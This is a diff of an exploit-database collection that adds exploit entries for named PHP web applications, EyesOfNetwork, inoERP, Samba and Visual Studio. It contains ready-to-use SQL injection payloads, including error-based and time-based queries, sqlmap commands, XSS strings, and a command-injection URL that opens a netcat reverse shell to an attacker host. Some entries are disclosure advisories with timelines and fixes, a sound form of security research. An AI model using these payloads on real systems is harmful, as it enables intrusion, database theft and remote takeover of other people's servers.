hard to win the race. (It shouldn't be too hard to adapt the SMB client to + be asynchronous, which would make the attack much more practical.) To make it + easier to hit the race, log in to the server as root and run "strace" against + the process that is trying to access foobar/secret all the time without any + filtering ("strace -p19624"). On my machine, this causes the race to be hit + every few seconds, and the smbclient that is running the "dump" command + prints the contents of the file each time the race is won. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip diff --git a/platforms/php/webapps/41724.txt b/platforms/php/webapps/41724.txt new file mode 100755 index 000000000..79327bc35 --- /dev/null +++ b/platforms/php/webapps/41724.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection +# Google Dork: N/A +# Date: 25.03.2017 +# Vendor Homepage: http://justanothervideoscript.com/ +# Software: http://justanothervideoscript.com/demo +# Demo: http://javsdemo.com/ +# Version: 1.4.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL] +# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL] +# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL] +# # # # # + diff --git a/platforms/php/webapps/41725.txt b/platforms/php/webapps/41725.txt new file mode 100755 index 000000000..46182fd0f --- /dev/null +++ b/platforms/php/webapps/41725.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Adult Tube Video Script - SQL Injection +# Google Dork: N/A +# Date: 25.03.2017 +# Vendor Homepage: http://www.boysofts.com/ +# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip +# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/single-video.php?video_id=[SQL] +# http://localhost/[PATH]/search.php?page=[SQL] +# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41726.txt b/platforms/php/webapps/41726.txt new file mode 100755 index 000000000..7462cae59 --- /dev/null +++ b/platforms/php/webapps/41726.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Alibaba Clone Script - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html +# Demo: http://thealidemox.com +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL] +# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL] +# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL] +# Etc... +# # # # # diff --git a/platforms/php/webapps/41727.txt b/platforms/php/webapps/41727.txt new file mode 100755 index 000000000..c88584f21 --- /dev/null +++ b/platforms/php/webapps/41727.txt @@ -0,0 +1,22 @@ +# # # # # +# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2 +# Demo: http://demob2b.xyz/ +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL] +# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL] +# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL] +# Etc... +# # # # # + diff --git a/platforms/php/webapps/41728.txt b/platforms/php/webapps/41728.txt new file mode 100755 index 000000000..50a31a40a --- /dev/null +++ b/platforms/php/webapps/41728.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Real Estate Property Pro Script - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://www.eaglescripts.com/php-property-portal-script +# Demo: http://realpro.phpscriptsdemo.com/ +# Version: Pro +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL] +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41729.txt b/platforms/php/webapps/41729.txt new file mode 100755 index 000000000..304c9642d --- /dev/null +++ b/platforms/php/webapps/41729.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Courier Tracking Software v6.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6 +# Demo: http://courierv6.couriersoftwares.com/ +# Version: 6.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL] +# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL] +# user:username +# user:hub_name +# user:password +# user:hidden_pass +# user:entrydate +# user:onlinestatus +# user:status +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41730.txt b/platforms/php/webapps/41730.txt new file mode 100755 index 000000000..29460001b --- /dev/null +++ b/platforms/php/webapps/41730.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://www.eaglescripts.com/parcel-delivery-booking-script +# Demo: http://parceldelivery.phpscriptsdemo.com/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL] +# Etc... +# # # # # diff --git a/platforms/php/webapps/41731.txt b/platforms/php/webapps/41731.txt new file mode 100755 index 000000000..ef86973fe --- /dev/null +++ b/platforms/php/webapps/41731.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://www.eaglescripts.com/delux-same-day-delivery +# Demo: http://deluxesameday.logistic-softwares.com/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/show_page/[PAGE][SQL] +# Etc... +# # # # # diff --git a/platforms/php/webapps/41732.txt b/platforms/php/webapps/41732.txt new file mode 100755 index 000000000..3e24cf7ee --- /dev/null +++ b/platforms/php/webapps/41732.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: http://www.eaglescripts.com/hotel-booking-script +# Demo: http://hotelbooking.phpscriptsdemo.com/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL] +# http://localhost/[PATH]/view_news.php?news_id=[SQL] +# http://localhost/[PATH]/page.php?id=[SQL] +# http://localhost/[PATH]/?show=view_room&room_id=[SQL] +# admin:id +# admin:username +# admin:password +# booking:id +# booking:cat_name +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41733.txt b/platforms/php/webapps/41733.txt new file mode 100755 index 000000000..d6e0528ec --- /dev/null +++ b/platforms/php/webapps/41733.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Tour Package Booking v1.0 - SQL Injection +# Google Dork: N/A +# Date: 26.03.2017 +# Vendor Homepage: http://eagletechnosys.com/ +# Software: www.eaglescripts.com/tour-package-booking-script +# Demo: http://tourbooking.phpscriptsdemo.com/ +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/package/category/1[SQL] +# http://localhost/[PATH]/package_detail/1[SQL] +# Etc... +# # # # # diff --git a/platforms/php/webapps/41735.txt b/platforms/php/webapps/41735.txt new file mode 100755 index 000000000..899348286 --- /dev/null +++ b/platforms/php/webapps/41735.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Professional Bus Booking Script - SQL Injection +# Google Dork: N/A +# Date: 27.03.2017 +# Vendor Homepage: http://travelbookingscript.com/ +# Software: http://travelbookingscript.com/professional-bus-booking-script.html +# Demo: http://travelbookingscript.com/demo/professional/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL] +# # # # # diff --git a/platforms/php/webapps/41736.txt b/platforms/php/webapps/41736.txt new file mode 100755 index 000000000..7319083c6 --- /dev/null +++ b/platforms/php/webapps/41736.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: CouponPHP Script v3.1 - SQL Injection +# Google Dork: N/A +# Date: 27.03.2017 +# Vendor Homepage: http://couponphp.com/ +# Software: http://couponphp.com/demos +# Demo: http://newdemo2.couponphp.com +# Demo: http://newdemo3.couponphp.com +# Version: 3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL] +# users +# id +# username +# password +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41746.txt b/platforms/php/webapps/41746.txt new file mode 100755 index 000000000..33305c038 --- /dev/null +++ b/platforms/php/webapps/41746.txt @@ -0,0 +1,132 @@ +# [CVE-2017-6087] EON 5.0 Remote Code Execution + +## Description + +EyesOfNetwork ("EON") is an OpenSource network monitoring solution. + +## Remote Code Execution (authenticated) + +The Eonweb code does not correctly filter arguments, allowing +authenticated users to execute arbitrary code. + +**CVE ID**: CVE-2017-6087 + +**Access Vector**: remote + +**Security Risk**: high + +**Vulnerability**: CWE-78 + +**CVSS Base Score**: 7.6 + +**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L + + +### Proof of Concept 1 + +On the attacker's host, we start a handler: + +``` +nc -lvp 1337 +``` + +The `selected_events` parameter is not correctly filtered before it is +used by the `shell_exec()` function. + +There, it is possible to inject a payload like in the request below, +where we connect back to our handler: + +``` +https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash; +``` + +#### Vulnerable code + +The payload gets injected into the `$event[$key]` and `$ged_command` +variables of the `module/monitoring_ged/ged_functions.php` file, line 373: + +``` +$ged_command = "-update -type $ged_type_nbr "; +foreach ($array_ged_packets as $key => $value) { + if($value["type"] == true){ + if($key == "owner"){ + $event[$key] = $owner; + } + $ged_command .= "\"".$event[$key]."\" "; + } +} +$ged_command = trim($ged_command, " "); +shell_exec($path_ged_bin." ".$ged_command); +``` + +Two other functions in this file are also affected by this problem: + +* `delete($selected_events, $queue);` +* `ownDisown($selected_events, $queue, $global_action);` + + +### Proof of Concept 2 + +On the attacker's host, we start a handler: + +``` +nc -lvp 1337 +``` + +The `module` parameter is not correctly filtered before it is used by +the `shell_exec()` function. + +Again, we inject our connecting back payload: + +``` +https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding +``` + +#### Vulnerable code + +In the `module/index.php` file, line 24, we can see that our payload is +injected into the `exec()` function without any sanitization: + +``` +# Check optionnal module to load +if(isset($_GET["module"]) && isset($_GET["link"])) { + + $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l"); + + # Redirect to module page if rpm installed + if($module!=0) { header('Location: '.$_GET["link"].''); } + +} +``` + + +## Timeline (dd/mm/yyyy) + +* 01/10/2016 : Initial discovery. +* 09/10/2016 : Fisrt contact with vendor. +* 23/10/2016 : Technical details sent to the security contact. +* 27/10/2016 : Vendor akwnoledgement and first patching attempt. +* 11/10/2016 : Testing the patch revealed that it needed more work. +* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. +* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our +repsonsible disclosure agreement. +* 14/03/2017 : Public disclosure. + +Thank you to EON for the fast response. + +## Solution + +Update to version 5.1 + +## Affected versions + +* Version <= 5.0 + +## Credits + +* Nicolas SERRA + +-- SYSDREAM Labs +GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 +* Website: https://sysdream.com/ * +Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/41747.txt b/platforms/php/webapps/41747.txt new file mode 100755 index 000000000..8e1c145d5 --- /dev/null +++ b/platforms/php/webapps/41747.txt @@ -0,0 +1,172 @@ +# [CVE-2017-6088] EON 5.0 Multiple SQL Injection + +## Description + +EyesOfNetwork ("EON") is an OpenSource network monitoring solution. + +## SQL injection (authenticated) + +The Eonweb code does not correctly filter arguments, allowing +authenticated users to inject arbitrary SQL requests. + +**CVE ID**: CVE-2017-6088 + +**Access Vector**: remote + +**Security Risk**: medium + +**Vulnerability**: CWE-89 + +**CVSS Base Score**: 6.0 + +**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L + +### Proof of Concept 1 (root privileges) + +The following HTTP request allows an attacker (connected as +administrator) to dump the database contents using SQL injections inside +either the `bp_name` or the `display` parameter. These requests are +executed with MySQL root privileges. + +``` +https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271 + +https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1 +``` + +#### Vulnerable code + +The vulnerable code can be found inside the +`module/monitoring_ged/ged_functions.php` file, line 114: + +``` +function list_process($bp,$display,$bdd){ + $sql = "select name from bp where is_define = 1 and name!='".$bp."' +and priority = '" . $display . "'"; + $req = $bdd->query($sql); + $process = $req->fetchall(); + + echo json_encode($process); +} +``` + +### Proof of Concept 2 + +The following HTTP request allows an attacker to dump the database +contents using SQL injections inside the `type` parameter: + +``` +https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= +``` + +#### Vulnerable code + +The vulnerable code can be found inside the +`module/monitoring_ged/ajax.php` file, line 64: + +``` +if($_GET["type"] == 0){ + $ged_where = "WHERE pkt_type_id!='0'"; +} else { + $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'"; +} +$gedsql_result1=sqlrequest($database_ged,"SELECT +pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';"); +``` + +### Proof of Concept 3 + +The following HTTP request allows an attacker to dump the database +contents using SQL injections inside the `search` parameter: + +``` +https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time= +``` + + +#### Vulnerable code + +The vulnerable code can be found inside the +`module/monitoring_ged/ged_functions.php` file, line 129. + +``` +if($search != ""){ + $like = ""; + if( substr($search, 0, 1) === '*' ){ + $like .= "%"; + } + $like .= trim($search, '*'); + if ( substr($search, -1) === '*' ) { + $like .= "%"; + } + + $where_clause .= " AND $filter LIKE '$like'"; +} +``` + + +### Proof of Concept 4 + +The following HTTP request allows an attacker to dump the database +contents using SQL injections inside the `equipment` parameter: + +``` +https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit +1)&queue=history +``` + + +#### Vulnerable code + +The vulnerable code can be found inside the +`module/monitoring_ged/ged_functions.php` file, line 493: + +``` +$gedsql_result1=sqlrequest($database_ged,"SELECT +pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND +pkt_type_id<'100';"); + + +while($ged_type = mysqli_fetch_assoc($gedsql_result1)){ + $sql = "SELECT DISTINCT $filter FROM +".$ged_type["pkt_type_name"]."_queue_".$queue; + + $results = sqlrequest($database_ged, $sql); + while($result = mysqli_fetch_array($results)){ + if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){ + array_push($datas, $result[$filter]); + } + } +} +``` + + +## Timeline (dd/mm/yyyy) + +* 01/10/2016 : Initial discovery. +* 09/10/2016 : Fisrt contact with vendor. +* 23/10/2016 : Technical details sent to the security contact. +* 27/10/2016 : Vendor akwnoledgement and first patching attempt. +* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed. +* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our +repsonsible disclosure agreement. +* 14/03/2017 : Public disclosure. + +Thank you to EON for the fast response. + +## Solution + +Update to version 5.1. + +## Affected versions + +* Version <= 5.0 + +## Credits + +* Nicolas SERRA + +-- SYSDREAM Labs +GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 +* Website: https://sysdream.com/ +* Twitter: @sysdream \ No newline at end of file diff --git a/platforms/php/webapps/41749.txt b/platforms/php/webapps/41749.txt new file mode 100755 index 000000000..a48e4d168 --- /dev/null +++ b/platforms/php/webapps/41749.txt @@ -0,0 +1,157 @@ +=== FOXMOLE - Security Advisory 2017-01-25 === + +inoERP - Multiple Issues +~~~~~~~~~~~~~~~~~~~~~~~~~ + +Affected Versions +================= +inoERP 0.6.1 + +Issue Overview +============== +Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation +Technical Risk: critical +Likelihood of Exploitation: medium +Vendor: inoERP +Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP +Credits: FOXMOLE employee Tim Herres +Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt +Advisory Status: Public +OVE-ID: OVE-20170126-0002 +CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) + + +Impact +====== +There are multiple SQL Injection vulnerabilities, exploitable without authentication. +An attacker could use the SQL Injection to access the database in an unsafe way. +This means there is a high impact to all applications. +The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities. + + +Issue Description +================= +The following findings are only examples, there are quite more. The whole application should be reviewed. + +All items tested using FF52. + +1.) Cross Site Scripting: +Stored: +Create a new Question in the -->Forum --> Ask a question +Vulnerable fields : Title, Content +Used Payload: Test + +Response: +[...] + Test<script>alert("xss")</script> - inoERP! +[...] + +The latest questions are included in the start page which means the entered payload gets executed directly in the start page. + +Reflected: +With Auth: +http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7 +http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22) +%3C/scRipt%3E +http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report + +Unauthenticated: +http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E + +2.) No protection against Cross Site Request Forgery Attacks: +PoC: Changing the admin user credentials. + + + +
+ + + + + + + + + + + + + + + +[..snipped...] + +If a privileged user activates the request, the admin user id=1 is set to "test". + +3.) SQL Injection: +Auth required:No +##### +http://192.168.241.143/inoerp/form.php? +Parameter: module_code (GET) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN +0x74657374 ELSE 0x28 END))-- qkmO + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: module_code=test' AND (SELECT 8706 FROM(SELECT +COUNT(*),CONCAT(0x716b7a6271,(SELECT +(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq + + Type: stacked queries + Title: MySQL > 5.0.11 stacked queries (comment) + Payload: module_code=test';SELECT SLEEP(5)# + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: module_code=test' OR SLEEP(5)-- STgC + +Exploitable using e.g. SQLMAP + +Blind SQL Injection: +sqlmap -u +"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all" + -p "content_type%5b%5d" --dbms="MySQL" +Parameter: content_type[] (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: content_type[]=-8366' OR 7798=7798 AND +'eanR'='eanR&search_text=3&search_document_list[]=all + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: content_type[]=test' OR SLEEP(5) AND +'exIO'='exIO&search_text=3&search_document_list[]=all +##### + +4.) Session Fixation: +After a successful login the SessionID PHPSESSID remains the same: +Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2 +After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2 + + + + +Temporary Workaround and Fix +============================ +FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed. + + + +History +======= +2017-01-25 Issue discovered +2017-01-26 Vendor contacted -> no response +2017-02-20 Vendor contacted again -> no response +2017-03-06 Vendor contacted again -> no response +2017-03-27 Advisory Release + + +GPG Signature +============= +This advisory is signed with the GPG key of the FOXMOLE advisories team. +The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc \ No newline at end of file diff --git a/platforms/windows/dos/41734.c b/platforms/windows/dos/41734.c new file mode 100755 index 000000000..c99ba4ac9 --- /dev/null +++ b/platforms/windows/dos/41734.c @@ -0,0 +1,177 @@ +# Exploit Title: Microsoft Visual Studio 2015 update 3 – Stack overflow +# Date: 2017-03-26 +# Exploit Author: Peter Baris +# Vendor Homepage: http://www.saptech-erp.com.au +# Software Link: https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15 +# Version: Visual Studio 2015 update 3 +# Tested on: Windows 7 Pro SP1 x64, Windows 10 Pro x64 + + + +Windbg output + + + +Crash 1: + + + +eax=1469f040 ebx=00000000 ecx=1469f040 edx=165f4634 esi=1469f040 edi=0036e2d8 + +eip=16610c9d esp=00279000 ebp=0027900c iopl=0 nv up ei pl zr na pe nc + +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 + + + +VCProject!CVCNode::GetVCProject+0x49: + + + +16610c9d ff523c call dword ptr [edx+3Ch] ds:002b:165f4670={VCProject!CVCNode::GetVCProject (16610c64)} + + + + + +0:000> !exchain + +0036e2dc: VCProject!memcmp+86f5 (166956e8) + +0036e30c: VCProject!memcmp+876b (166957b0) + +0036e384: msenv!_aulldiv+476d1 (31e3d818) + +0036e424: msenv!_aulldiv+1567e (31df2c66) + +0036e478: msenv!_aulldiv+65abf (31e6a010) + +0036e4c4: vcpkg!sqlite3_value_type+1f3a (3940ac50) + +0036e530: msenv!_aulldiv+2b169 (31e135dc) + +0036e578: msenv!_aulldiv+2bb07 (31e145ac) + +0036e5cc: msenv!_aulldiv+2b1de (31e136ca) + + + +0:000> k + +# ChildEBP RetAddr + +00 0027900c 16610ca0 VCProject!CVCNode::GetVCProject+0x49 + +01 00279020 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + +02 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + +… + +ff 00279034 16610ca0 VCProject!CVCNode::GetVCProject+0x53 + + + + + + + +Crash 2: + + + +(10cc.1970): CLR exception - code e0434352 (first chance) + + + +(10cc.1970): Stack overflow - code c00000fd (first chance) + + + +eax=08675cf0 ebx=00000000 ecx=08675cf0 edx=39784634 esi=08675cf0 edi=0043e0f0 + +eip=397a0c68 esp=00349000 ebp=00349004 iopl=0 nv up ei pl zr na pe nc + +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 + + + +VCProject!CVCNode::GetVCProject+0x4: + +397a0c68 57 push edi + + + +0:000> !exchain + +0043e0f4: VCProject!memcmp+86f5 (398256e8) + +0043e124: VCProject!memcmp+876b (398257b0) + +0043e19c: msenv!_aulldiv+476d1 (51e1d818) + +0043e23c: msenv!_aulldiv+1567e (51dd2c66) + +0043e290: msenv!_aulldiv+65abf (51e4a010) + +0043e2dc: vcpkg!sqlite3_value_type+1f3a (390bac50) + +0043e348: msenv!_aulldiv+2b169 (51df35dc) + +0043e390: msenv!_aulldiv+2bb07 (51df45ac) + +0043e3e4: msenv!_aulldiv+2b1de (51df36ca) + + + +15a0a150 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a151 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a152 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a153 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a154 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a155 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a156 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + +15a0a157 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + + + + +Peter + + + +crash.c + +// Exploit Title : Microsoft Visual Studio 2015 update 3 – Stack overflow +// Date : 2017 - 03 - 26 +// Exploit Author : Peter Baris +// Vendor Homepage : http://www.saptech-erp.com.au +// Software Link : https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15 +// Version : 2015 update 3 +// Tested on : Windows 7 Pro SP1 x64, Windows 10 Pro x64 + +// 2017-03-05 Reported to Microsoft +// a few ignorant messages from microsoft, stating that this is not causing data loss +// I have sent explanation about ctrl-s key combination +// 2017-03-26 Publishing + + +// Procedure to trigger the vulnerability +// Open the c source file simply by double clicing it +// In the properties windows change "Included In Project" to False -> click back to your source code's window + +#include + +int main() +{ + + 